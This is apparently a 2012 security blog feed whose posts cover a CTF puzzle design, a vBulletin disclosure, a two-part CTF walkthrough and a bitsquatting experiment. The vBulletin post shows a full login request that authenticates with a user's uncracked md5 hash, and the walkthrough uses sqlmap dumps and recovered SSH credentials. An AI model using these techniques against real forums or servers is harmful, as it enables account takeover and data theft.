<blockquote class="tr_bq">
My puzzler. This is a challenge created and designed to be completed within a day. It was something I wrote up in a few weekends. I didn't make the code pretty so it might take a little while to adapt to your own servers if you want to set it up. If you want to take the time, the instructions are here. You'll need to change a couple references to domains in some PHP files and a pcap. You'll also need to set up mySQL, an IRC server, and install Comic Sans which is a nonstandard font on Linux. I set this up on an Ubuntu box but you can probably make it work on any flavor of Linux.</blockquote>
<blockquote class="tr_bq">
<br />
<a name='more'></a><br /></blockquote>
<blockquote class="tr_bq">
The challenge is accomplished in a linear fashion where the URL to the next step is given upon completing the first step.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
ZEROTH STAGE************************************************</blockquote>
<blockquote class="tr_bq">
This is an optional stage where I put together a huge obfuscated blob of text containing a URL pointing to the first stage. I used the converter tool found at this blog:</blockquote>
<blockquote class="tr_bq">
http://www.kahusecurity.com/tools/</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Here is an example blob of text. The blob that I made was totally massive and I made it by feeding the obfuscated text back into the obfuscator for more. </blockquote>
<blockquote class="tr_bq">
%54%68%69%73%20%74%65%78%74%20%6C%65%74%73%20%79%6F%75%20%6B%6E%6F%77%20%79%6F%75%20%64%65%63%6F%64%65%64%20%69%74%20%72%69%67%68%74%2C%20%62%75%74%20%79%6F%75%20%61%72%65%6E%27%74%20%64%6F%6E%65%20%79%65%74%2E%0D%0A%53%47%56%79%5A%53%42%70%63%79%42%30%61%47%55%67%56%56%4A%4D%49%48%64%6F%61%57%4E%6F%49%48%42%76%61%57%35%30%63%79%42%30%62%79%42%30%61%47%55%67%62%6D%56%34%64%43%42%7A%64%47%46%6E%5A%51%3D%3D</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Of course, if you want to have this stage then you'll need to make your own.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
FIRST STAGE************************************************</blockquote>
<blockquote class="tr_bq">
This is a login page that authenticates using the client only. There is a highly secure javascript to protect against right clicks, and an FBI warning to boot! Finally, there is a chunk of obfuscated javascript. I used Dean Edward's packer to obfuscate, and then broke it in small ways so the corresponding de-obfuscater could not be used. If the user can reach page453543543.php successfully, then they are pointed to the second stage. </blockquote>
<blockquote class="tr_bq">
-You'll need to supply your own URL on that page.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
SECOND STAGE************************************************</blockquote>
<blockquote class="tr_bq">
first it contains a SQL injection specially designed to foil automated scanners. All SQL error messages are displayed, but they are only displayed rendered as a PNG image, in bright pink Comic Sans. No SQL scanner I know of can get these error messages, and any tool that I run against it spews garbage because it literally reads the PNG data. To make it work:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
-you need to install the comic sans font which is not standard to Linux distributions. If you receive font errors you can change line 15 in image.php to refer to a different font or directory of your choice. I included the font file in this package. </blockquote>
<blockquote class="tr_bq">
-You may also need to install some non-standard php image manipulation libraries(I don't remember which) but it's likely you will have that by default.</blockquote>
<blockquote class="tr_bq">
-You need to set up mySQL and run the .sql script so your database is populated with the necessary data. The SQL username and password is on lines 11 and 12 of index.php</blockquote>
<blockquote class="tr_bq">
-You also need to set up an IRC server, protected by a server password of your choice. Details below:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
The pcap itself contains a record of a user logging into my IRC server over plain text while visiting some websites at the same time. The correct packet is the only one on its port, and would appear anomalous when viewing statistics about the pcap. There is a server password used to log in to the IRC server, so one would have to find the correct packet in the pcap to find the correct domain and password. It points to a domain I own, and if you wanted to set up your own IRC server, I suggest you set it up with a server password, and run a packet capture of yourself while visiting websites and logging into your own IRC server. </blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
The final, winning step of the puzzle is of course when the user can find the correct IRC credentials, log in, and join the #winnerscircle channel.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Hopefully you find this challenge as devious and frustrating as I intended it to be.</blockquote>
</blockquote>
<br />
A final mention- there are a couple references left in the pcap of the domain I originally used. I used to point it to a sinkhole because the previous owner used it for malware. I am not responsible for the malware but it amused me to hold a challenge on a domain that would trigger DNS blacklist alerts for any contestants. You are of course free to use any domain you want to register. YMMV.Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-88203069458425005542012-11-16T23:15:00.002-08:002012-12-06T20:00:40.821-08:00Old Working Exploits - or how you can log in to vbulletin forums with a user's uncracked hashThis is an issue I reported way back in 12/11/10 (reference SID-1046901-fc4373fb) and they declined to recognize it as a bug, so I'll post it for the benefit of the public.<br />
<br />
It requires an uncracked md5 hash of a user's password on vBulletin forums. When you log in, it doesn't actually transmit the password in plain text - it transmits the md5 hash of the password. That's great! So any forum software running on http won't be nearly as vulnerable to sniffing plaintext passwords. There's a problem, though:<br />
<br />
md5 is commonly used as a password hashing algorithm, and hacked websites out there commonly have databases full of these accounts. Typically, md5sum hashed passwords can be cracked 40-50 percent of the time. Hackers use a lot of password-reuse attacks and the fact that you can pass along a hash instead of the cracked password means that that if you're part of the 50-60 percent of users with an uncrackable password, any accounts you have on a VBulletin forum aren't safe, if you've reused your passwords. The issue can be mitigated by updating the password sending method to anything that an attacker can't use a known md5sum to log in with.<br />
<br />
It's an edge case for sure, but if you're in the business of mass hacking accounts, then perhaps this edge case can net you that many more victims.<br />
<br />
Here's an example login request that would be produced from any of the latest VB forums:<br />
<br />
username: abcd<br />
password: aaaa<br />
hash: 74b87337454200d4d33f80c4663dc5e5 = aaaa<br />
<br />
<br />
POST /login.php?do=login HTTP/1.1<br />
Host: forums.forum.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
DNT: 1<br />
Proxy-Connection: keep-alive<br />
Referer: http://forums.forum.com/<br />
Cookie: bbsessionhash=bbd4f543da0af78506ebe3b185368240; bblastvisit=1353135560; bblastactivity=0; AAJSID=balancer.www1<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 185<br />
<br />
vb_login_username=abcd&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=74b87337454200d4d33f80c4663dc5e5&vb_login_md5password_utf=74b87337454200d4d33f80c4663dc5e5Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-79540451042164819142012-11-14T17:32:00.003-08:002012-12-06T20:00:49.211-08:00Hackin' The Boss [Part 2]<br />
Before diving into the injectable "id" parameter, I wanted to explore other options to potentially gain complete control over the target. This would in effect make finding the remaining flags quite simple. With that goal in mind, and a local saved version of the "test.php" configuration page (which was removed by this time, of course I kept a copy) it was time to start looking for potential methods of ingress.<br />
<br />
After exploring multiple OSINT sources (Shodan, Exploit-DB to name a few), I wasn't able to find much promising literature. Perhaps then, if the webapps weren't the gateway I needed, something else that could provide me access. A quick nmap of common ephemeral ports indicated that, as expected, ports 80 and 443 were open. However, port 22 (SSH) was also open. Not a ton of additional information, but enough for nmap to fingerprint the OS. Next up, the excellent Metasploit front-end gui, Armitage.<br />
<br />
With Metasploit updated, I loaded up Armitage and ran a msfscan against the target host. Selecting "find attacks" revealed a large number of potential exploits to try. Since I was behind my totally not-at-all suspicious VPN, it was to time fire everything at the CTF server. Alas, all automated attempts failed and no sessions were established. Oh well, it can't always be easy! **Note: Apparently, the original CTF was designed to be vulnerable to the php_eval() module found in Metasploit, apparently this particular setup was not vulnerable.**<br />
<br />
My first plan thwarted, it was time to dump the database and comb for useful information (and flags!). With ye olde sqlmap up and running, I fed the parameter "id=" to the beast. Within a minute, the entire database had been dumped to my local hard drive and while watching the console print the results, I noticed a pretty interesting flag that appeared to have credentials! Unfortunately, the console has scrolled far too quickly for me to catch the details, so I started to dig into the dumped db information to retrieve what looked to be my golden ticket.<br />
<br />
After a quick search, I found the flag in the "board.users" table of the database which contained a user/password combination. The next flag was found in "test.notes", and this seemed to be the only other flag present in the db dump. I now had 5/11 (at the time, thought to be 12) flags, MySQL database credentials, and what appeared to be a user/password combination. From previous nmapping, I knew that port 22 was open, so it was time to try and login with the recovered credentials.<br />
<br />
With the provided Username/Password combo, I was able to SSH successfully to the CTF server. The home directory contained a single file, an ELF executable, which accepted a string as its parameters. Sensing the presence of another flag a hexdumped the file and found flag #6 (I should have just run a strings against the file, but I wanted to see the context). I moved to the base directory and found another text file labelled "flag". Boom, #7. At this point, I wasn't entirely sure where to look next, so I poked around until I got to /etc/php/apache2 and catted out the php.ini file. Therein was flag #8.<br />
<br />
Moving back into the /var/www/ directory, there was an additional element included with this version of the CTF that differed from the OWASP one. A fully functional, basic version of "Frogger" (written in JavaScript) was present. I have never been good at frogger, and I expected there could be a flag hidden somewhere. I grepped through the various files found in the directory to no avail, but decided to take a second look at the JavaScript of the game. Inside was a hex encoded string, flag #9.<br />
<br />
Since I had the MySQL database credentials, why not connect to the database and check for the presence of more flags? Upon successful connection and enumeration of the table names, several simple SELECT * FROM queries confirmed the 2 previous flags I had found, and an additional flag in "board.posts" which I had previously missed. And thus Flag #10 was recovered.<br />
<br />
Unfortunately, I wasn't able to recover the last flag. Apparently there was a webpage with a very colorful, animated image with a flag embedded as a test of one's steganography skills. I had suspected this seizure inducing page hid a flag, but I never suspected steganography. Yeah, I completely missed that one (I would blame colorblindness, but that likely isn't an adequate excuse). Oh well, 10 of 11 Isn't too bad!<br />
<br />
All in all, this was a lot of fun. If you haven't participated in a CTF event before, I would highly recommend it. Especially if the CTF server belongs to your boss. That makes it all the sweeter.<br />
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-89699521694477391962012-11-12T14:29:00.002-08:002012-12-06T20:00:49.212-08:00Hackin' the Boss [Part 1]<br />
After attending a local OWASP chapter conference, DA "The Boss" decided that he wanted to replicate the CTF experience for those of us on the Analysis Team at DSWRX in Providence.<br />
<br />
Here's a quick write-up of my experience as a simulated "Pentester" (a complete 180 from my normal work role).<br />
<br />
The Server was built using the latest [as of September 2012] Ubuntu Server with a typical, updated LAMP installation. All source code for the actual CTF WebApp was obtained from the previously mentioned OWASP meeting. This setup led to the first problem: the updated PHP was not vulnerable to the Metasploit module: /unix/webapp/php_eval, and thus one of the 12 Flags was not obtainable. 11 to go!<br />
<br />
I only looked at the actual webpage, a domain provided by a co-worker, once to look for potential injectionable parameters. Since I had not previously taken part in a scenario like this, I wanted to experiment with some of the tools packaged with the excellent BackTrack 5r3.<br />
<br />
I started up my local version of BackTrack, logged into a not-at-all suspicious VPN, and fired up burp (free edition) to start mapping the entire website. Immediately I saw that the typical "test.php" page was still enabled, which typically provides a verbose listing of server and application configurations. I mentioned this to "The Boss" eventually and it was then disabled. Following that I found the first flag using a relatively simple XSS. The second tag quickly followed as I was browsing through the completed spider report and found a URI for "flag" (a text file in /var/www/). Having exhausted the obvious options, it was time to start reading the source code!<br />
<br />
From a quick review of the source, I was able to find: an additional flag (#3), default MySQL credentials (Hard-coded), and a parameter to test for SQLi. After a quick test it was pretty clear that the "id" parameter was vulnerable to SQLi, and thus after some useless spamming of the webpage with W3AF, it was time to get down to business.Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-60981593801514951302012-11-12T14:23:00.000-08:002012-12-06T20:00:40.819-08:00Why this domain?I originally registered this domain back in 2011, shortly after this talk was released:<br />
<a href="http://www.blackhat.com/html/bh-us-11/bh-us-11-archives.html">http://www.blackhat.com/html/bh-us-11/bh-us-11-archives.html</a><br />
"Bit-squatting: DNS Hijacking without exploitation"<br />
<br />
It intrigued me and I attempted to duplicate the results of this experiment. micrmsoft.com was one of several domains I registered. I got some variants of paypal, mozilla, and facebook domains as well, but microsoft variants yielded the most misdirected requests. My conclusion was ultimately that the author of the original talk was not full of BS, and traffic to microsoft was high enough that there will be some misdirected requests going to the domain. The paypal, mozilla, and facebook domains did not perform nearly as well.<br />
<br />
Here's a small example pcap from a day of traffic:<br />
<a href="http://micrmsoft.com/smallsample.pcap">http://micrmsoft.com/smallsample.pcap</a><br />
<br />
example request:<br />
<br />
GET /pki/certs/MicrosoftWinIntPCA.crt HTTP/1.1<br />
Accept: */*<br />
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512<br />
Host: www.micrmsoft.com<br />
Connection: Keep-Alive<br />
<br />
<br />
You can see that the vast majority of those requests are from crawlers, but occasionally you'll see a few Microsoft CryptoAPI requesting some certs. I think this bit flip stuff is really only a concern for the top handful of domains in the world, but it was interesting to see a tiny slice of what Microsoft sees. <br />
<br />
Could this be used for evil? Perhaps this could be used to MITM some poor soul's failing hardware. We only monitored passively and did not see any personal information. After the misdirected requests for certificates were given 404 errors, the errant IPs did not come back again.<br />
<br />
Edit: This was recently released, and the original author discusses much more in depth information on the subject: http://blog.dinaburg.org/2012/10/a-preview-of-bitsquatting-pcaps.htmlAllison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-12972120646675610232012-11-12T12:41:00.001-08:002012-12-06T20:00:40.816-08:00First post!!!!This is the first post of our blog. This blog is to document shenanigans and whatever interesting discoveries. Current contributors are Allison Nixon(@nixonnixoff) and Brandon Levene(@SeraphimDomain).<br />
<br />
First content, here's a link to a Sophos puzzle that we won: <a href="http://nakedsecurity.sophos.com/2012/11/05/wall-of-fame-for-skyfall-sophospuzzle/">http://nakedsecurity.sophos.com/2012/11/05/wall-of-fame-for-skyfall-sophospuzzle/</a><br />
<br />
The challenge was pretty tough, and involved several puzzles as well as cracking a variant of the Vigenère cipher. But we managed to submit answers in time to get t-shirts. Horray for us!Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0